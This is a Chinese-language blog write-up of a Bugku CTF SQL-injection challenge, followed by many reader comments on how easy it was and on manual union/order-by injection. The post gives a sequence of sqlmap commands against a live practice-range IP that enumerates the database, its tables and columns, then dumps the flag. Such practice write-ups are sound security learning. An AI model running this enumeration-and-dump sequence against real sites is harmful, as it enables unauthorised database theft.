新版newbugku-web5-injection Writeup

枫少@KillBoy
枫少@KillBoy
管理员
220
文章
0
粉丝
SQL注入4833,4883字数 167阅读0分33秒阅读模式
AI智能摘要
看到“flag”就心跳加速?一个看似普通的留言板,竟暗藏SQL注入漏洞。通过简单的URL参数操纵,利用sqlmap工具层层深入,从探测数据库到爆破表、字段,最终直取flag。本文手把手带你复现CTF解题全过程,揭秘Web安全攻防的底层逻辑,每一个步骤都是实战派的硬核经验。
— AI 生成的文章内容摘要

打开网页,看到一个留言板

新版newbugku-web5-injection Writeup-图片1

不知道为什么,看到flag这个字眼就特别兴奋。。。。。于是点进去看看

新版newbugku-web5-injection Writeup-图片2

看到URL地址可能存在SQL注入

http://47.95.208.167:10005/?mod=read&id=1

于是可爱的我打开sqlmap跑一下试试

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" --current-db

新版newbugku-web5-injection Writeup-图片3
卧槽,竟然跑出来了,这题好弱。。。。那我们就找flag吧,爆表。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 --tables –batch

新版newbugku-web5-injection Writeup-图片4
有一个名字叫flag的表,,,继续,爆字段。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag --columns –batch

新版newbugku-web5-injection Writeup-图片5
只有一个flag的字段,,,那就爆数据吧。。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag -C flag --dump  --batch

新版newbugku-web5-injection Writeup-图片6
得到flag。。。。。这题好弱。。

热门话题

SQL注入攻击的基本原理与分类解析
自动化渗透测试工具的发展趋势
如何提升SQL注入防护的有效性?

历史上的今天
3 月
21
 
枫少@KillBoy
  • bugku
  • flag
  • injection
  • it2021
  • it2021.com
  • newbugku
  • SQL注入
  • web5
  • 新版newbugku
评论  48  访客  48
    • 愤怒的风暴
      愤怒的风暴 0
      辽宁省沈阳市 1F
      回复

      sqlmap一把梭,毫无挑战性啊😂

      • 忠诚的卫士
        忠诚的卫士 0
        湖北省武汉市 2F
        回复

        新手问下,为啥id=1就能注入?没过滤吗?

        • 蝶舞翩跹
          蝶舞翩跹 0
          北京市 3F
          回复

          之前打过类似靶场,这种留言本注入早该修了

          • 高山向导
            高山向导 1
            上海市 4F
            回复

            卧槽我也跑出来了,但总觉得是不是有坑?

            • Blossom Haze
              Blossom Haze 1
              山东省临沂市 5F
              回复

              又是裸奔的SQL查询,开发睡着了?

              • 尘外游
                尘外游 0
                中国 6F
                回复

                求问大佬,手工注入咋搞?想练练手

                • 幽梦无痕
                  幽梦无痕 0
                  韩国 7F
                  回复

                  看到flag俩字就激动,结果秒出…有点懵

                  • 黄金之翼
                    黄金之翼 0
                    辽宁省沈阳市 8F
                    回复

                    这配置放真实环境早被拖库八百回了

                    • 江山如画
                      江山如画 1
                      辽宁省沈阳市 9F
                      回复

                      吃瓜.jpg 这题防御形同虚设啊

                      • 夜幕独行
                        夜幕独行 0
                        韩国 10F
                        回复

                        这题也太离谱了,flag表名都不改的?

                        • 暗夜猎刃
                          暗夜猎刃 0
                          浙江省 11F
                          回复

                          这题也太简单了吧,flag表直接暴露?

                          • 翠绿行者
                            翠绿行者 0
                            巴基斯坦 12F
                            回复

                            之前搞过这个,手工注入得配联合查询才行

                            • 铁锈钥匙
                              铁锈钥匙 0
                              韩国 13F
                              回复

                              id参数没过滤简直离谱,新手都能秒?

                              • 银灰旋律
                                银灰旋律 0
                                上海市 14F
                                回复

                                求问手工怎么判断字段数啊,一直报错

                                • 灶王爷笑
                                  灶王爷笑 0
                                  北京市 15F
                                  回复

                                  这也叫CTF?丢人现眼了属于是

                                  • 布布兔兔
                                    布布兔兔 1
                                    广东省汕尾市 16F
                                    回复

                                    看到sqlmap直接跑我就知道没难度了

                                    • 梦的彼岸
                                      梦的彼岸 1
                                      湖北省天门市 17F
                                      回复

                                      真实环境这么玩早被删库跑路八百回了

                                      • Potter Pearl
                                        Potter Pearl 0
                                        湖南省长沙市 18F
                                        回复

                                        我试了下burp抓包,果然返回异常信息太多

                                        • 鬼灯明
                                          鬼灯明 0
                                          印度尼西亚 19F
                                          回复

                                          flag就在那儿明摆着,还有啥意思😂

                                          • 穿山甲建筑师
                                            穿山甲建筑师 0
                                            天津市 20F
                                            回复

                                            这种靶场就是练手用的吧,别太认真

                                            • 夜息蝶
                                              夜息蝶 1
                                              江苏省连云港市 21F
                                              回复

                                              这题纯属练手,flag都写脸上了😂

                                              • 云端的鲸鱼
                                                云端的鲸鱼 1
                                                日本 22F
                                                回复

                                                手工注入搞不来,union select老报错咋办?

                                                • 环保卫士
                                                  环保卫士 0
                                                  北京市 23F
                                                  回复

                                                  真实环境敢这么写,DBA早被开除了吧

                                                  • 幻月幽兰
                                                    幻月幽兰 0
                                                    北京市 24F
                                                    回复

                                                    看到sqlmap直接梭哈,连payload都不用写

                                                    • 右耳听雨
                                                      右耳听雨 0
                                                      湖南省 25F
                                                      回复

                                                      我用bp抓包时发现报错信息太直白了,太容易被爆了

                                                      • 梦独行
                                                        梦独行 0
                                                        浙江省杭州市 26F
                                                        回复

                                                        新手村题目都算不上,这也能叫CTF?

                                                        • Cobbler Cyrus
                                                          Cobbler Cyrus 0
                                                          北京市 27F
                                                          回复

                                                          之前搞过类似的,union注入得先判断字段数,用order by

                                                          • 社恐小仓鼠
                                                            社恐小仓鼠 0
                                                            山东省烟台市长岛县 28F
                                                            回复

                                                            那个啥,id参数没过滤真的假的?这也太离谱了

                                                            • Titan泰坦
                                                              Titan泰坦 1
                                                              韩国 29F
                                                              回复

                                                              sqlmap一键跑穿太草了

                                                              • 墨梅
                                                                墨梅 0
                                                                湖南省株洲市 30F
                                                                回复

                                                                吃瓜群众路过,这防御等于没防啊

                                                                • 泥匠唐
                                                                  泥匠唐 0
                                                                  日本 31F
                                                                  回复

                                                                  卧槽我也试了,一条命令就出flag,太草了

                                                                  • Mason Micah
                                                                    Mason Micah 0
                                                                    河南省安阳市 32F
                                                                    回复

                                                                    这表名叫flag是生怕别人找不到吗

                                                                    • 暮色沉舟
                                                                      暮色沉舟 0
                                                                      美国 33F
                                                                      回复

                                                                      求问大佬手工检测步骤,想练练基本功

                                                                      • 星尘航线
                                                                        星尘航线 0
                                                                        浙江省舟山市 34F
                                                                        回复

                                                                        开发上线前都不做SQL过滤的吗,离谱

                                                                        • 灵魂画师
                                                                          灵魂画师 1
                                                                          日本 35F
                                                                          回复

                                                                          感觉还行,至少让我学会了sqlmap基础命令

                                                                          • 微笑的云
                                                                            微笑的云 1
                                                                            江苏省苏州市 36F
                                                                            回复

                                                                            以前我也踩过这坑,以为参数安全结果被注入了

                                                                            • 茶语人生
                                                                              茶语人生 0
                                                                              泰国 37F
                                                                              回复

                                                                              sqlmap是神器,但不懂原理的话换个场景就歇菜

                                                                              • 幽荧凝霜
                                                                                幽荧凝霜 0
                                                                                日本 38F
                                                                                回复

                                                                                flag明文存数据库,不怕被删库跑路?

                                                                                • 虎克船长
                                                                                  虎克船长 1
                                                                                  湖北省孝感市 39F
                                                                                  回复

                                                                                  这题简直是在教怎么用sqlmap,毫无技术含量

                                                                                  • 奶茶
                                                                                    奶茶 1
                                                                                    浙江省杭州市 40F
                                                                                    回复

                                                                                    看到URL带参数就知道要出事,果不其然

                                                                                    • 皮皮虾の秘密
                                                                                      皮皮虾の秘密 0
                                                                                      印度 41F
                                                                                      回复

                                                                                      是不是有隐藏关卡啊,这么容易反而不真实

                                                                                      • 喵喵大魔王
                                                                                        喵喵大魔王 1
                                                                                        澳大利亚 42F
                                                                                        回复

                                                                                        这题也太裸了,flag表直接挂脸上?

                                                                                        • 问风
                                                                                          问风 0
                                                                                          广西 43F
                                                                                          回复

                                                                                          手工注入卡在order by,有老哥指点下不?

                                                                                          • 流浪月光
                                                                                            流浪月光 1
                                                                                            北京市 44F
                                                                                            回复

                                                                                            吃瓜.jpg 防御等于没防,纯送分

                                                                                            • Fly云
                                                                                              Fly云 1
                                                                                              澳大利亚 45F
                                                                                              回复

                                                                                              之前搞过这个,union得先测字段数,不然报错

                                                                                              • 远行者
                                                                                                远行者 1
                                                                                                北京市 46F
                                                                                                回复

                                                                                                id=1就能梭哈?开发是实习生吧

                                                                                                • 烟雨阑珊
                                                                                                  烟雨阑珊 0
                                                                                                  湖南省岳阳市 47F
                                                                                                  回复

                                                                                                  sqlmap跑完我都懵了,这也算CTF?

                                                                                                  • 菜鸡联盟
                                                                                                    菜鸡联盟 1
                                                                                                    澳大利亚 48F
                                                                                                    回复

                                                                                                    卧槽我也秒了,但总觉得后面有坑🤔

                                                                                                  匿名

                                                                                                  发表评论

                                                                                                  匿名网友

                                                                                                  拖动滑块以完成验证